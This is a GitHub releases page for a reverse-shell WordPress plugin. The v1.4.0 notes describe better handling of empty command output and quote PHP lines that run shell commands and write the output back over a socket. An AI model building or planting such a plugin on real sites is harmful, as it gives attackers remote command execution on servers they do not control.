Skip to content

Releases: 4m3rr0r/Reverse-Shell-WordPress-Plugin

v1.4.0

14 Jan 15:16
c4c5fe5
Compare
Choose a tag to compare

Fix: Handle null or empty command output in reverse shell connection

In this update, the reverse shell connection was enhanced to handle cases where the shell command produces null or empty output. Previously, this could have led to connection instability or crashes. The following changes were made:

  • Null or Empty Output Handling: If the shell command does not return any output, a fallback message is now sent to the socket, preventing any connection issues.
    $output = shell_exec($cmd);
    fwrite($sock, $output ?: 'No output from command.');

v1.3.0

12 Jan 05:11
df9d692
Compare
Choose a tag to compare
Update reverse-shell.php